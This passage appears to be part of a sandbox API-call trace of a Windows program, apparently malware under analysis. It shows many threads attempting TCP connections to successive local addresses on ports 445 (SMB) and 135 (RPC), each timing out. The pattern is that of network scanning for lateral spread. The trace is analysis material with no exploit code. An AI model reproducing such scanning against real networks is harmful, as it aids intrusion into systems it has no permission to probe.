(af=2, type=1, protocol=6) returned 0xc6c [0096.354] ioctlsocket (in: s=0xc6c, cmd=-2147195266, argp=0xcb6ff34 | out: argp=0xcb6ff34) returned 0 [0096.355] connect (s=0xc6c, name=0xcb6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.141"), namelen=16) returned -1 [0096.355] WSAGetLastError () returned 10035 [0096.355] select (in: nfds=0, readfds=0x0, writefds=0xcb6fd08, exceptfds=0xcb6fe10, timeout=0xcb6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xcb6fd08, exceptfds=0xcb6fe10) returned 0 [0101.455] closesocket (s=0xc6c) returned 0 [0101.456] RtlExitUserThread (Status=0x0) Thread: id = 172 os_tid = 0xc9c [0091.324] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20732f0 [0091.325] free (_Block=0x20732f0) [0091.325] inet_addr (cp="192.168.0.140") returned 0x8c00a8c0 [0091.325] htons (hostshort=0x1bd) returned 0xbd01 [0091.325] socket (af=2, type=1, protocol=6) returned 0xc78 [0091.325] ioctlsocket (in: s=0xc78, cmd=-2147195266, argp=0xccaff34 | out: argp=0xccaff34) returned 0 [0091.325] connect (s=0xc78, name=0xccaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.140"), namelen=16) returned -1 [0091.326] WSAGetLastError () returned 10035 [0091.326] select (in: nfds=0, readfds=0x0, writefds=0xccafd08, exceptfds=0xccafe10, timeout=0xccaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xccafd08, exceptfds=0xccafe10) returned 0 [0096.352] closesocket (s=0xc78) returned 0 [0096.353] inet_addr (cp="192.168.0.140") returned 0x8c00a8c0 [0096.353] htons (hostshort=0x87) returned 0x8700 [0096.353] socket (af=2, type=1, protocol=6) returned 0xc78 [0096.353] ioctlsocket (in: s=0xc78, cmd=-2147195266, argp=0xccaff34 | out: argp=0xccaff34) returned 0 [0096.353] connect (s=0xc78, name=0xccaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.140"), namelen=16) returned -1 [0096.354] WSAGetLastError () returned 10035 [0096.354] select (in: nfds=0, readfds=0x0, writefds=0xccafd08, exceptfds=0xccafe10, timeout=0xccaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xccafd08, exceptfds=0xccafe10) returned 0 [0101.457] closesocket (s=0xc78) returned 0 [0101.457] RtlExitUserThread (Status=0x0) Thread: id = 173 os_tid = 0xca0 [0091.355] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20732c8 [0091.355] free (_Block=0x20732c8) [0091.355] inet_addr (cp="192.168.0.139") returned 0x8b00a8c0 [0091.355] htons (hostshort=0x1bd) returned 0xbd01 [0091.355] socket (af=2, type=1, protocol=6) returned 0xc84 [0091.355] ioctlsocket (in: s=0xc84, cmd=-2147195266, argp=0xcdeff34 | out: argp=0xcdeff34) returned 0 [0091.364] connect (s=0xc84, name=0xcdeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.139"), namelen=16) returned -1 [0091.364] WSAGetLastError () returned 10035 [0091.365] select (in: nfds=0, readfds=0x0, writefds=0xcdefd08, exceptfds=0xcdefe10, timeout=0xcdeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xcdefd08, exceptfds=0xcdefe10) returned 0 [0096.368] closesocket (s=0xc84) returned 0 [0096.368] inet_addr (cp="192.168.0.139") returned 0x8b00a8c0 [0096.369] htons (hostshort=0x87) returned 0x8700 [0096.369] socket (af=2, type=1, protocol=6) returned 0xc84 [0096.369] ioctlsocket (in: s=0xc84, cmd=-2147195266, argp=0xcdeff34 | out: argp=0xcdeff34) returned 0 [0096.369] connect (s=0xc84, name=0xcdeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.139"), namelen=16) returned -1 [0096.369] WSAGetLastError () returned 10035 [0096.369] select (in: nfds=0, readfds=0x0, writefds=0xcdefd08, exceptfds=0xcdefe10, timeout=0xcdeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xcdefd08, exceptfds=0xcdefe10) returned 0 [0101.463] closesocket (s=0xc84) returned 0 [0101.463] RtlExitUserThread (Status=0x0) Thread: id = 174 os_tid = 0xca4 [0091.367] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20732a0 [0091.367] free (_Block=0x20732a0) [0091.367] inet_addr (cp="192.168.0.138") returned 0x8a00a8c0 [0091.367] htons (hostshort=0x1bd) returned 0xbd01 [0091.368] socket (af=2, type=1, protocol=6) returned 0xc90 [0091.368] ioctlsocket (in: s=0xc90, cmd=-2147195266, argp=0xcf2ff34 | out: argp=0xcf2ff34) returned 0 [0091.368] connect (s=0xc90, name=0xcf2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.138"), namelen=16) returned -1 [0091.369] WSAGetLastError () returned 10035 [0091.369] select (in: nfds=0, readfds=0x0, writefds=0xcf2fd08, exceptfds=0xcf2fe10, timeout=0xcf2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xcf2fd08, exceptfds=0xcf2fe10) returned 0 [0096.370] closesocket (s=0xc90) returned 0 [0096.370] inet_addr (cp="192.168.0.138") returned 0x8a00a8c0 [0096.370] htons (hostshort=0x87) returned 0x8700 [0096.370] socket (af=2, type=1, protocol=6) returned 0xc90 [0096.371] ioctlsocket (in: s=0xc90, cmd=-2147195266, argp=0xcf2ff34 | out: argp=0xcf2ff34) returned 0 [0096.371] connect (s=0xc90, name=0xcf2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.138"), namelen=16) returned -1 [0096.371] WSAGetLastError () returned 10035 [0096.371] select (in: nfds=0, readfds=0x0, writefds=0xcf2fd08, exceptfds=0xcf2fe10, timeout=0xcf2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xcf2fd08, exceptfds=0xcf2fe10) returned 0 [0101.461] closesocket (s=0xc90) returned 0 [0101.462] RtlExitUserThread (Status=0x0) Thread: id = 175 os_tid = 0xca8 [0091.372] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073278 [0091.372] free (_Block=0x2073278) [0091.372] inet_addr (cp="192.168.0.137") returned 0x8900a8c0 [0091.372] htons (hostshort=0x1bd) returned 0xbd01 [0091.372] socket (af=2, type=1, protocol=6) returned 0xc9c [0091.372] ioctlsocket (in: s=0xc9c, cmd=-2147195266, argp=0xd06ff34 | out: argp=0xd06ff34) returned 0 [0091.372] connect (s=0xc9c, name=0xd06ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.137"), namelen=16) returned -1 [0091.373] WSAGetLastError () returned 10035 [0091.373] select (in: nfds=0, readfds=0x0, writefds=0xd06fd08, exceptfds=0xd06fe10, timeout=0xd06ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd06fd08, exceptfds=0xd06fe10) returned 0 [0096.371] closesocket (s=0xc9c) returned 0 [0096.372] inet_addr (cp="192.168.0.137") returned 0x8900a8c0 [0096.372] htons (hostshort=0x87) returned 0x8700 [0096.372] socket (af=2, type=1, protocol=6) returned 0xc9c [0096.372] ioctlsocket (in: s=0xc9c, cmd=-2147195266, argp=0xd06ff34 | out: argp=0xd06ff34) returned 0 [0096.373] connect (s=0xc9c, name=0xd06ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.137"), namelen=16) returned -1 [0096.373] WSAGetLastError () returned 10035 [0096.373] select (in: nfds=0, readfds=0x0, writefds=0xd06fd08, exceptfds=0xd06fe10, timeout=0xd06ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd06fd08, exceptfds=0xd06fe10) returned 0 [0101.460] closesocket (s=0xc9c) returned 0 [0101.460] RtlExitUserThread (Status=0x0) Thread: id = 176 os_tid = 0xcac [0091.377] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073250 [0091.377] free (_Block=0x2073250) [0091.377] inet_addr (cp="192.168.0.136") returned 0x8800a8c0 [0091.377] htons (hostshort=0x1bd) returned 0xbd01 [0091.377] socket (af=2, type=1, protocol=6) returned 0xca8 [0091.377] ioctlsocket (in: s=0xca8, cmd=-2147195266, argp=0xd1aff34 | out: argp=0xd1aff34) returned 0 [0091.377] connect (s=0xca8, name=0xd1aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.136"), namelen=16) returned -1 [0091.379] WSAGetLastError () returned 10035 [0091.379] select (in: nfds=0, readfds=0x0, writefds=0xd1afd08, exceptfds=0xd1afe10, timeout=0xd1aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd1afd08, exceptfds=0xd1afe10) returned 0 [0096.385] closesocket (s=0xca8) returned 0 [0096.385] inet_addr (cp="192.168.0.136") returned 0x8800a8c0 [0096.385] htons (hostshort=0x87) returned 0x8700 [0096.385] socket (af=2, type=1, protocol=6) returned 0xca8 [0096.386] ioctlsocket (in: s=0xca8, cmd=-2147195266, argp=0xd1aff34 | out: argp=0xd1aff34) returned 0 [0096.386] connect (s=0xca8, name=0xd1aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.136"), namelen=16) returned -1 [0096.386] WSAGetLastError () returned 10035 [0096.386] select (in: nfds=0, readfds=0x0, writefds=0xd1afd08, exceptfds=0xd1afe10, timeout=0xd1aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd1afd08, exceptfds=0xd1afe10) returned 0 [0101.464] closesocket (s=0xca8) returned 0 [0101.465] RtlExitUserThread (Status=0x0) Thread: id = 177 os_tid = 0xcb0 [0091.383] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073228 [0091.383] free (_Block=0x2073228) [0091.383] inet_addr (cp="192.168.0.135") returned 0x8700a8c0 [0091.383] htons (hostshort=0x1bd) returned 0xbd01 [0091.383] socket (af=2, type=1, protocol=6) returned 0xcb4 [0091.383] ioctlsocket (in: s=0xcb4, cmd=-2147195266, argp=0xd2eff34 | out: argp=0xd2eff34) returned 0 [0091.383] connect (s=0xcb4, name=0xd2eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.135"), namelen=16) returned -1 [0091.384] WSAGetLastError () returned 10035 [0091.384] select (in: nfds=0, readfds=0x0, writefds=0xd2efd08, exceptfds=0xd2efe10, timeout=0xd2eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd2efd08, exceptfds=0xd2efe10) returned 0 [0096.383] closesocket (s=0xcb4) returned 0 [0096.384] inet_addr (cp="192.168.0.135") returned 0x8700a8c0 [0096.384] htons (hostshort=0x87) returned 0x8700 [0096.384] socket (af=2, type=1, protocol=6) returned 0xcb4 [0096.384] ioctlsocket (in: s=0xcb4, cmd=-2147195266, argp=0xd2eff34 | out: argp=0xd2eff34) returned 0 [0096.384] connect (s=0xcb4, name=0xd2eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.135"), namelen=16) returned -1 [0096.385] WSAGetLastError () returned 10035 [0096.385] select (in: nfds=0, readfds=0x0, writefds=0xd2efd08, exceptfds=0xd2efe10, timeout=0xd2eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd2efd08, exceptfds=0xd2efe10) returned 0 [0101.466] closesocket (s=0xcb4) returned 0 [0101.466] RtlExitUserThread (Status=0x0) Thread: id = 178 os_tid = 0xcb4 [0091.467] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073200 [0091.467] free (_Block=0x2073200) [0091.467] inet_addr (cp="192.168.0.134") returned 0x8600a8c0 [0091.467] htons (hostshort=0x1bd) returned 0xbd01 [0091.467] socket (af=2, type=1, protocol=6) returned 0xcc0 [0091.467] ioctlsocket (in: s=0xcc0, cmd=-2147195266, argp=0xd42ff34 | out: argp=0xd42ff34) returned 0 [0091.467] connect (s=0xcc0, name=0xd42ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.134"), namelen=16) returned -1 [0091.468] WSAGetLastError () returned 10035 [0091.468] select (in: nfds=0, readfds=0x0, writefds=0xd42fd08, exceptfds=0xd42fe10, timeout=0xd42ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd42fd08, exceptfds=0xd42fe10) returned 0 [0096.523] closesocket (s=0xcc0) returned 0 [0096.524] inet_addr (cp="192.168.0.134") returned 0x8600a8c0 [0096.524] htons (hostshort=0x87) returned 0x8700 [0096.524] socket (af=2, type=1, protocol=6) returned 0xcc0 [0096.524] ioctlsocket (in: s=0xcc0, cmd=-2147195266, argp=0xd42ff34 | out: argp=0xd42ff34) returned 0 [0096.524] connect (s=0xcc0, name=0xd42ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.134"), namelen=16) returned -1 [0096.525] WSAGetLastError () returned 10035 [0096.526] select (in: nfds=0, readfds=0x0, writefds=0xd42fd08, exceptfds=0xd42fe10, timeout=0xd42ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd42fd08, exceptfds=0xd42fe10) returned 0 [0101.713] closesocket (s=0xcc0) returned 0 [0101.714] RtlExitUserThread (Status=0x0) Thread: id = 179 os_tid = 0xcb8 [0091.469] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20731d8 [0091.469] free (_Block=0x20731d8) [0091.469] inet_addr (cp="192.168.0.133") returned 0x8500a8c0 [0091.469] htons (hostshort=0x1bd) returned 0xbd01 [0091.469] socket (af=2, type=1, protocol=6) returned 0xccc [0091.471] ioctlsocket (in: s=0xccc, cmd=-2147195266, argp=0xd56ff34 | out: argp=0xd56ff34) returned 0 [0091.471] connect (s=0xccc, name=0xd56ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.133"), namelen=16) returned -1 [0091.472] WSAGetLastError () returned 10035 [0091.472] select (in: nfds=0, readfds=0x0, writefds=0xd56fd08, exceptfds=0xd56fe10, timeout=0xd56ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd56fd08, exceptfds=0xd56fe10) returned 0 [0096.526] closesocket (s=0xccc) returned 0 [0096.526] inet_addr (cp="192.168.0.133") returned 0x8500a8c0 [0096.526] htons (hostshort=0x87) returned 0x8700 [0096.526] socket (af=2, type=1, protocol=6) returned 0xccc [0096.527] ioctlsocket (in: s=0xccc, cmd=-2147195266, argp=0xd56ff34 | out: argp=0xd56ff34) returned 0 [0096.527] connect (s=0xccc, name=0xd56ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.133"), namelen=16) returned -1 [0096.527] WSAGetLastError () returned 10035 [0096.527] select (in: nfds=0, readfds=0x0, writefds=0xd56fd08, exceptfds=0xd56fe10, timeout=0xd56ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd56fd08, exceptfds=0xd56fe10) returned 0 [0101.711] closesocket (s=0xccc) returned 0 [0101.712] RtlExitUserThread (Status=0x0) Thread: id = 180 os_tid = 0xcbc [0091.473] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20731b0 [0091.473] free (_Block=0x20731b0) [0091.473] inet_addr (cp="192.168.0.132") returned 0x8400a8c0 [0091.473] htons (hostshort=0x1bd) returned 0xbd01 [0091.473] socket (af=2, type=1, protocol=6) returned 0xcd8 [0091.473] ioctlsocket (in: s=0xcd8, cmd=-2147195266, argp=0xd6aff34 | out: argp=0xd6aff34) returned 0 [0091.473] connect (s=0xcd8, name=0xd6aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.132"), namelen=16) returned -1 [0091.474] WSAGetLastError () returned 10035 [0091.474] select (in: nfds=0, readfds=0x0, writefds=0xd6afd08, exceptfds=0xd6afe10, timeout=0xd6aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd6afd08, exceptfds=0xd6afe10) returned 0 [0096.527] closesocket (s=0xcd8) returned 0 [0096.527] inet_addr (cp="192.168.0.132") returned 0x8400a8c0 [0096.528] htons (hostshort=0x87) returned 0x8700 [0096.528] socket (af=2, type=1, protocol=6) returned 0xcd8 [0096.528] ioctlsocket (in: s=0xcd8, cmd=-2147195266, argp=0xd6aff34 | out: argp=0xd6aff34) returned 0 [0096.528] connect (s=0xcd8, name=0xd6aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.132"), namelen=16) returned -1 [0096.528] WSAGetLastError () returned 10035 [0096.528] select (in: nfds=0, readfds=0x0, writefds=0xd6afd08, exceptfds=0xd6afe10, timeout=0xd6aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd6afd08, exceptfds=0xd6afe10) returned 0 [0101.710] closesocket (s=0xcd8) returned 0 [0101.710] RtlExitUserThread (Status=0x0) Thread: id = 181 os_tid = 0xcc0 [0091.474] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073188 [0091.474] free (_Block=0x2073188) [0091.474] inet_addr (cp="192.168.0.131") returned 0x8300a8c0 [0091.474] htons (hostshort=0x1bd) returned 0xbd01 [0091.474] socket (af=2, type=1, protocol=6) returned 0xce4 [0091.475] ioctlsocket (in: s=0xce4, cmd=-2147195266, argp=0xd7eff34 | out: argp=0xd7eff34) returned 0 [0091.475] connect (s=0xce4, name=0xd7eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.131"), namelen=16) returned -1 [0091.475] WSAGetLastError () returned 10035 [0091.475] select (in: nfds=0, readfds=0x0, writefds=0xd7efd08, exceptfds=0xd7efe10, timeout=0xd7eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd7efd08, exceptfds=0xd7efe10) returned 0 [0096.528] closesocket (s=0xce4) returned 0 [0096.529] inet_addr (cp="192.168.0.131") returned 0x8300a8c0 [0096.529] htons (hostshort=0x87) returned 0x8700 [0096.529] socket (af=2, type=1, protocol=6) returned 0xce4 [0096.529] ioctlsocket (in: s=0xce4, cmd=-2147195266, argp=0xd7eff34 | out: argp=0xd7eff34) returned 0 [0096.529] connect (s=0xce4, name=0xd7eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.131"), namelen=16) returned -1 [0096.530] WSAGetLastError () returned 10035 [0096.530] select (in: nfds=0, readfds=0x0, writefds=0xd7efd08, exceptfds=0xd7efe10, timeout=0xd7eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd7efd08, exceptfds=0xd7efe10) returned 0 [0101.708] closesocket (s=0xce4) returned 0 [0101.709] RtlExitUserThread (Status=0x0) Thread: id = 182 os_tid = 0xcc4 [0091.476] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073160 [0091.476] free (_Block=0x2073160) [0091.476] inet_addr (cp="192.168.0.130") returned 0x8200a8c0 [0091.476] htons (hostshort=0x1bd) returned 0xbd01 [0091.476] socket (af=2, type=1, protocol=6) returned 0xcf0 [0091.476] ioctlsocket (in: s=0xcf0, cmd=-2147195266, argp=0xd92ff34 | out: argp=0xd92ff34) returned 0 [0091.476] connect (s=0xcf0, name=0xd92ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.130"), namelen=16) returned -1 [0091.477] WSAGetLastError () returned 10035 [0091.477] select (in: nfds=0, readfds=0x0, writefds=0xd92fd08, exceptfds=0xd92fe10, timeout=0xd92ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd92fd08, exceptfds=0xd92fe10) returned 0 [0096.530] closesocket (s=0xcf0) returned 0 [0096.531] inet_addr (cp="192.168.0.130") returned 0x8200a8c0 [0096.531] htons (hostshort=0x87) returned 0x8700 [0096.531] socket (af=2, type=1, protocol=6) returned 0xcf0 [0096.531] ioctlsocket (in: s=0xcf0, cmd=-2147195266, argp=0xd92ff34 | out: argp=0xd92ff34) returned 0 [0096.531] connect (s=0xcf0, name=0xd92ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.130"), namelen=16) returned -1 [0096.531] WSAGetLastError () returned 10035 [0096.531] select (in: nfds=0, readfds=0x0, writefds=0xd92fd08, exceptfds=0xd92fe10, timeout=0xd92ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xd92fd08, exceptfds=0xd92fe10) returned 0 [0101.706] closesocket (s=0xcf0) returned 0 [0101.707] RtlExitUserThread (Status=0x0) Thread: id = 183 os_tid = 0xcc8 [0091.477] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073138 [0091.477] free (_Block=0x2073138) [0091.477] inet_addr (cp="192.168.0.129") returned 0x8100a8c0 [0091.477] htons (hostshort=0x1bd) returned 0xbd01 [0091.477] socket (af=2, type=1, protocol=6) returned 0xcfc [0091.478] ioctlsocket (in: s=0xcfc, cmd=-2147195266, argp=0xda6ff34 | out: argp=0xda6ff34) returned 0 [0091.478] connect (s=0xcfc, name=0xda6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.129"), namelen=16) returned -1 [0091.478] WSAGetLastError () returned 10035 [0091.478] select (in: nfds=0, readfds=0x0, writefds=0xda6fd08, exceptfds=0xda6fe10, timeout=0xda6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xda6fd08, exceptfds=0xda6fe10) returned 0 [0096.532] closesocket (s=0xcfc) returned 0 [0096.532] inet_addr (cp="192.168.0.129") returned 0x8100a8c0 [0096.532] htons (hostshort=0x87) returned 0x8700 [0096.532] socket (af=2, type=1, protocol=6) returned 0xcfc [0096.533] ioctlsocket (in: s=0xcfc, cmd=-2147195266, argp=0xda6ff34 | out: argp=0xda6ff34) returned 0 [0096.533] connect (s=0xcfc, name=0xda6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.129"), namelen=16) returned -1 [0096.533] WSAGetLastError () returned 10035 [0096.533] select (in: nfds=0, readfds=0x0, writefds=0xda6fd08, exceptfds=0xda6fe10, timeout=0xda6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xda6fd08, exceptfds=0xda6fe10) returned 0 [0101.702] closesocket (s=0xcfc) returned 0 [0101.705] RtlExitUserThread (Status=0x0) Thread: id = 184 os_tid = 0xccc [0091.483] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073110 [0091.483] free (_Block=0x2073110) [0091.483] inet_addr (cp="192.168.0.128") returned 0x8000a8c0 [0091.483] htons (hostshort=0x1bd) returned 0xbd01 [0091.483] socket (af=2, type=1, protocol=6) returned 0xd08 [0091.483] ioctlsocket (in: s=0xd08, cmd=-2147195266, argp=0xdbaff34 | out: argp=0xdbaff34) returned 0 [0091.483] connect (s=0xd08, name=0xdbaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.128"), namelen=16) returned -1 [0091.484] WSAGetLastError () returned 10035 [0091.484] select (in: nfds=0, readfds=0x0, writefds=0xdbafd08, exceptfds=0xdbafe10, timeout=0xdbaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xdbafd08, exceptfds=0xdbafe10) returned 0 [0096.533] closesocket (s=0xd08) returned 0 [0096.534] inet_addr (cp="192.168.0.128") returned 0x8000a8c0 [0096.534] htons (hostshort=0x87) returned 0x8700 [0096.534] socket (af=2, type=1, protocol=6) returned 0xd08 [0096.534] ioctlsocket (in: s=0xd08, cmd=-2147195266, argp=0xdbaff34 | out: argp=0xdbaff34) returned 0 [0096.535] connect (s=0xd08, name=0xdbaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.128"), namelen=16) returned -1 [0096.535] WSAGetLastError () returned 10035 [0096.535] select (in: nfds=0, readfds=0x0, writefds=0xdbafd08, exceptfds=0xdbafe10, timeout=0xdbaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xdbafd08, exceptfds=0xdbafe10) returned 0 [0101.700] closesocket (s=0xd08) returned 0 [0101.701] RtlExitUserThread (Status=0x0) Thread: id = 185 os_tid = 0xcd0 [0091.484] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20730e8 [0091.484] free (_Block=0x20730e8) [0091.484] inet_addr (cp="192.168.0.127") returned 0x7f00a8c0 [0091.484] htons (hostshort=0x1bd) returned 0xbd01 [0091.484] socket (af=2, type=1, protocol=6) returned 0xd14 [0091.486] ioctlsocket (in: s=0xd14, cmd=-2147195266, argp=0xdceff34 | out: argp=0xdceff34) returned 0 [0091.486] connect (s=0xd14, name=0xdceff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.127"), namelen=16) returned -1 [0091.486] WSAGetLastError () returned 10035 [0091.486] select (in: nfds=0, readfds=0x0, writefds=0xdcefd08, exceptfds=0xdcefe10, timeout=0xdceff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xdcefd08, exceptfds=0xdcefe10) returned 0 [0096.546] closesocket (s=0xd14) returned 0 [0096.546] inet_addr (cp="192.168.0.127") returned 0x7f00a8c0 [0096.546] htons (hostshort=0x87) returned 0x8700 [0096.546] socket (af=2, type=1, protocol=6) returned 0xd14 [0096.547] ioctlsocket (in: s=0xd14, cmd=-2147195266, argp=0xdceff34 | out: argp=0xdceff34) returned 0 [0096.547] connect (s=0xd14, name=0xdceff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.127"), namelen=16) returned -1 [0096.547] WSAGetLastError () returned 10035 [0096.547] select (in: nfds=0, readfds=0x0, writefds=0xdcefd08, exceptfds=0xdcefe10, timeout=0xdceff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xdcefd08, exceptfds=0xdcefe10) returned 0 [0101.723] closesocket (s=0xd14) returned 0 [0101.724] RtlExitUserThread (Status=0x0) Thread: id = 186 os_tid = 0xcd4 [0091.487] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20730c0 [0091.487] free (_Block=0x20730c0) [0091.487] inet_addr (cp="192.168.0.126") returned 0x7e00a8c0 [0091.487] htons (hostshort=0x1bd) returned 0xbd01 [0091.487] socket (af=2, type=1, protocol=6) returned 0xd20 [0091.487] ioctlsocket (in: s=0xd20, cmd=-2147195266, argp=0xde2ff34 | out: argp=0xde2ff34) returned 0 [0091.487] connect (s=0xd20, name=0xde2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.126"), namelen=16) returned -1 [0091.488] WSAGetLastError () returned 10035 [0091.488] select (in: nfds=0, readfds=0x0, writefds=0xde2fd08, exceptfds=0xde2fe10, timeout=0xde2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xde2fd08, exceptfds=0xde2fe10) returned 0 [0096.544] closesocket (s=0xd20) returned 0 [0096.545] inet_addr (cp="192.168.0.126") returned 0x7e00a8c0 [0096.545] htons (hostshort=0x87) returned 0x8700 [0096.545] socket (af=2, type=1, protocol=6) returned 0xd20 [0096.545] ioctlsocket (in: s=0xd20, cmd=-2147195266, argp=0xde2ff34 | out: argp=0xde2ff34) returned 0 [0096.545] connect (s=0xd20, name=0xde2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.126"), namelen=16) returned -1 [0096.545] WSAGetLastError () returned 10035 [0096.545] select (in: nfds=0, readfds=0x0, writefds=0xde2fd08, exceptfds=0xde2fe10, timeout=0xde2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xde2fd08, exceptfds=0xde2fe10) returned 0 [0101.725] closesocket (s=0xd20) returned 0 [0101.726] RtlExitUserThread (Status=0x0) Thread: id = 187 os_tid = 0xcd8 [0091.488] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073098 [0091.488] free (_Block=0x2073098) [0091.488] inet_addr (cp="192.168.0.125") returned 0x7d00a8c0 [0091.488] htons (hostshort=0x1bd) returned 0xbd01 [0091.488] socket (af=2, type=1, protocol=6) returned 0xd2c [0091.489] ioctlsocket (in: s=0xd2c, cmd=-2147195266, argp=0xdf6ff34 | out: argp=0xdf6ff34) returned 0 [0091.489] connect (s=0xd2c, name=0xdf6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.125"), namelen=16) returned -1 [0091.492] WSAGetLastError () returned 10035 [0091.492] select (in: nfds=0, readfds=0x0, writefds=0xdf6fd08, exceptfds=0xdf6fe10, timeout=0xdf6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xdf6fd08, exceptfds=0xdf6fe10) returned 0 [0096.543] closesocket (s=0xd2c) returned 0 [0096.543] inet_addr (cp="192.168.0.125") returned 0x7d00a8c0 [0096.543] htons (hostshort=0x87) returned 0x8700 [0096.544] socket (af=2, type=1, protocol=6) returned 0xd2c [0096.544] ioctlsocket (in: s=0xd2c, cmd=-2147195266, argp=0xdf6ff34 | out: argp=0xdf6ff34) returned 0 [0096.544] connect (s=0xd2c, name=0xdf6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.125"), namelen=16) returned -1 [0096.544] WSAGetLastError () returned 10035 [0096.544] select (in: nfds=0, readfds=0x0, writefds=0xdf6fd08, exceptfds=0xdf6fe10, timeout=0xdf6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xdf6fd08, exceptfds=0xdf6fe10) returned 0 [0101.727] 